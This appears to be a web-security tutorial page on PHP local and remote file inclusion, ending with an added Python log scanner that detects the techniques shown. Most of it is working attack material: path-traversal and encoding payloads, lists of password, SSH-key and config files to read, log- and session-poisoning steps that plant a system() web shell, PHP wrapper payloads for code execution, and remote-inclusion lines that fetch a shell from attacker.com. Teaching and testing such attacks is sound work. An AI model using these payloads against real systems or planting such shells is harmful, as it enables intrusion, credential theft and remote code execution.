Web Application Attacks

File Inclusion Vulnerabilities (LFI/RFI)

File inclusion vulnerabilities arise when user-controlled input reaches include(), require() or a similar construct, letting an attacker read sensitive files or execute code of their choosing. They are most commonly found in PHP applications.

Understanding File Inclusion

Local File Inclusion (LFI)

LFI lets an attacker make the application include files that already exist on the server; the file's contents are returned, and any PHP it contains is executed:

// Vulnerable code
<?php include($_GET['page']); ?>

// Normal use
https://target.com/index.php?page=about.php

// LFI attack
https://target.com/index.php?page=../../../etc/passwd

Remote File Inclusion (RFI)

RFI lets an attacker make the application fetch and include a file from a remote server; it only works when allow_url_include is enabled (it is Off by default since PHP 5.2):

// Vulnerable code (requires allow_url_include=On)
<?php include($_GET['page']); ?>

// RFI attack
https://target.com/index.php?page=http://attacker.com/shell.php

Basic LFI Testing

Path Traversal

?page=../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc%2fpasswd
?page=..%252f..%252f..%252fetc%252fpasswd
?page=/etc/passwd

Null Byte Bypass (PHP < 5.3.4)

?page=../../../etc/passwd%00
?page=../../../etc/passwd%00.php

Common Files to Read

Linux:

/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/proc/self/environ
/proc/self/cmdline
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/auth.log
/home/user/.ssh/id_rsa
/home/user/.bash_history

Windows:

C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\win.ini
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\xampp\apache\logs\access.log

Application-Specific Files

# Web configs
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess

# Apache
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf

# Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default

LFI to Remote Code Execution

Log Poisoning

Step 1: Poison the log

# Apache access log
curl "http://target.com" -A "<?php system(\$_GET['cmd']); ?>"

# Or via netcat
nc target.com 80
GET /<?php system($_GET['cmd']); ?> HTTP/1.1
Host: target.com

Step 2: Include the poisoned log

?page=../../../var/log/apache2/access.log&cmd=id
?page=../../../var/log/apache2/error.log&cmd=id

SSH Log Poisoning

# Poison auth.log via SSH
ssh '<?php system($_GET["cmd"]); ?>'@target.com

# Include the log
?page=../../../var/log/auth.log&cmd=id

PHP Session Poisoning

# Sessions stored in /tmp/sess_<PHPSESSID>
# Inject PHP code into a session variable

# Include session file
?page=../../../tmp/sess_<your_session_id>

/proc/self/environ

# If User-Agent is logged to environ
curl "http://target.com/vuln.php?page=../../../proc/self/environ" -A "<?php system('id'); ?>"

PHP Wrappers

php://filter (Read Source Code)

# Read PHP source as base64
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/convert.base64-encode/resource=index.php

# Decode output
echo "base64_output" | base64 -d

php://input (RCE if allow_url_include=On)

# POST PHP code
curl -X POST "http://target.com/vuln.php?page=php://input" --data "<?php system('id'); ?>"

data:// (RCE if allow_url_include=On)

?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

zip:// Wrapper

# Create malicious zip
echo "<?php system('id'); ?>" > shell.php
zip shell.zip shell.php

# Upload zip then include
?page=zip://uploads/shell.zip%23shell.php

phar:// Wrapper

?page=phar://uploads/shell.phar/shell.php

Bypassing Filters

Extension Filters

?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc%2fpasswd
?page=..%252f..%252f..%252fetc%252fpasswd (double encoding)
?page=....\/....\/....\/etc/passwd
?page=/var/www/html/../../../etc/passwd

Path Truncation (PHP < 5.3)

# Paths longer than the filesystem limit (4096 bytes on Linux) are truncated, dropping an appended extension
?page=../../../etc/passwd/./././././<repeat until 4096>

Remote File Inclusion

Basic RFI

?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.php
?page=ftp://attacker.com/shell.php

RFI Bypasses

# Null byte
?page=http://attacker.com/shell.txt%00

# Double URL encode
?page=http%253A%252F%252Fattacker.com%252Fshell.txt

Hosting the Payload

# On attacker machine
echo "<?php system(\$_GET['cmd']); ?>" > shell.txt
python3 -m http.server 80

# Trigger RFI
http://target.com/vuln.php?page=http://attacker-ip/shell.txt&cmd=id

LFI/RFI Testing Workflow

1. Identify file inclusion points
   └── Parameters like page=, file=, include=

2. Test for basic LFI
   └── ../../../etc/passwd

3. Try bypass techniques
   └── Encoding, null bytes, path truncation

4. Test PHP wrappers
   └── php://filter for source code

5. Attempt RCE via LFI
   └── Log poisoning, PHP wrappers

6. Test for RFI
   └── Only if allow_url_include=On
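A defender-side counterpart to this workflow, added here as an example and not part of the original page: a scanner that pulls the request line out of Apache combined-format access-log entries and tags each query parameter that carries one of the techniques covered above (traversal, single and double URL encoding, %00 null bytes, php://, data://, zip:// and phar:// wrappers, remote URLs, and well-known sensitive paths). The log lines and the 203.0.113.9 address are constructed for the demo.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format lines (not real traffic); 203.0.113.9 is a documentation address.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 1450 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd%00 HTTP/1.1" 200 1450 "-" "curl/8.0"
10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 2100 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://203.0.113.9/shell.txt&cmd=id HTTP/1.1" 200 80 "-" "curl/8.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                      # ../ or ..\ (also matches inside ....//)
WRAPPER_RE = re.compile(r'^(php|data|zip|phar|expect)://', re.I)
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.I)
SENSITIVE_RE = re.compile(r'/etc/(passwd|shadow)|/proc/self/|/var/log/|/sess_|\.ssh/|win\.ini', re.I)

def normalize(value):
    # Percent-decode until stable so %2f, %252f and a literal / all compare equal
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def classify_value(raw):
    # Tags found in one raw (still-encoded) parameter value; empty set means nothing suspicious
    v = normalize(raw)
    checks = [
        ("traversal", TRAVERSAL_RE.search(v)),
        ("null-byte", "\x00" in v),                          # %00 truncation attempt
        ("php-wrapper", WRAPPER_RE.match(v)),
        ("remote-url", REMOTE_RE.match(v)),
        ("sensitive-path", SENSITIVE_RE.search(v)),
        ("double-encoding", "%" in raw and v != unquote(raw)),  # a second decode changed it
    ]
    return {tag for tag, hit in checks if hit}

def scan_log(text):
    # One finding per suspicious parameter: (client_ip, param, decoded_value, sorted tags)
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for pair in urlsplit(target).query.split("&"):
            key, _, raw = pair.partition("=")
            if tags := classify_value(raw):
                findings.append((ip, key, normalize(raw), sorted(tags)))
    return findings
```

Decoding before matching is what keeps the `%252f` and `....//` variants from slipping past a filter that only looks for a literal `../`; the same normalization belongs in any WAF or input-validation rule.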

Next, we'll cover file upload vulnerabilities and bypasses.